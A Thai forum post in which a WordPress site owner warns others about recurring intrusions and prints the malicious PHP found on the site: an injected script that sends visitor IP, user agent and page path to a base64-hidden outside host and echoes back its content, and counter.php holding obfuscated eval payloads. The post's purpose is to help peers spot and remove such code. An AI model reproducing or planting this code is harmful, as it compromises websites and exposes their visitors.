สืบเนื่องจาก มีคนไม่หวังดีโจมตีมาต่อเนื่องต่างๆนาๆ และพยายามเรื่อย ไม่รู้จะมาประสงค์ร้ายทำไมผมไปทำอะไรให้ ซึงผมก็ตรวจสอบทุกวัน วันละหลายรอบ ซึ่งเป็นความเคยชินไปแล้วมีไฟล์แปลกปลอมเข้ามาก็ลบตลอด และช่วงนี้พิเศษหน่อย มีมาทุกวัน
เลยอยากจะเอามาเตือนท่านอื่นด้วย
ของผมจะมี File มี code แปลกปลอมเข้ามาใน index.php footer.php ซึงจะมี code ดังนี้ ไม่รู้ว่ามีการทำงานอย่างไร
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr(
$sUserAgent, 'google') == false)&&(strstr(
$sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
หากเพื่อนๆเจอ code แบบนี้ให้ลบออกด่วนเลย
มีอีก ใน root เลย ลบบ่อยมากมันก็พยายามสร้าง ใช้ชื่อเดิม ลบจนเคยชินwp-app.php
wp-rdf.php
counter.php
ข้างในเปิดดู บางทีมีชื่อใหม่มาเรื่อยแต่ข้างในเหมือนเดิม <?php
/**
* Redirects to the RDF feed
* This file is deprecated and only exists for backwards compatibility
*
* @package WordPress
*/
require( './wp-load.php' );
wp_redirect( get_bloginfo( 'rdf_url' ), 301 );
exit;
?>
และ
ข้างใน wp-app.php ทั้งๆที่ผมไม่เคยสร้างมาก่อน ไม่รุ้มาได้ไง
<?php
/**
* Atom Publishing Protocol support for WordPress
*
* @version 1.0.5-dc
*/
/**
* WordPress is handling an Atom Publishing Protocol request.
*
* @var bool
*/
define('APP_REQUEST', true);
/** Set up WordPress environment */
require_once('./wp-load.php');
/** Atom Publishing Protocol Class */
require_once(ABSPATH . WPINC . '/atomlib.php');
/** Atom Server **/
require_once(ABSPATH . WPINC . '/class-wp-atom-server.php');
/** Admin Image API for metadata updating */
require_once(ABSPATH . '/wp-admin/includes/image.php');
$_SERVER['PATH_INFO'] = preg_replace( '/.*\/wp-app\.php/', '', $_SERVER['REQUEST_URI'] );
// Allow for a plugin to insert a different class to handle requests.
$wp_atom_server_class = apply_filters('wp_atom_server_class', 'wp_atom_server');
$wp_atom_server = new $wp_atom_server_class;
// Handle the request
$wp_atom_server->handle_request();
exit;
/**
* Writes logging info to a file.
*
* @since 2.2.0
* @deprecated 3.4.0
* @deprecated Use error_log()
* @link
http://www.php.net/manual/en/function.error-log.php *
* @param string $label Type of logging
* @param string $msg Information describing logging reason.
*/
function log_app( $label, $msg ) {
_deprecated_function( __FUNCTION__, '3.4', 'error_log()' );
if ( ! empty( $GLOBALS['app_logging'] ) )
error_log( $label . ' - ' . $msg );
}
ข้างใน counter.php ใครแปลได้ก็เอามาแฉหน่อยครับ <?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>
และอีกหลาย file จำไม่ได้ละเจอ file แปลกลบไว้ก่อน แนะนำให้ท่านๆ หมั่นตรวจสอบดู file แปลกปลอมด้วยนะครับ ก่อนที่จะมานั่งเสียอารมณ์+เสียใจทีหลัง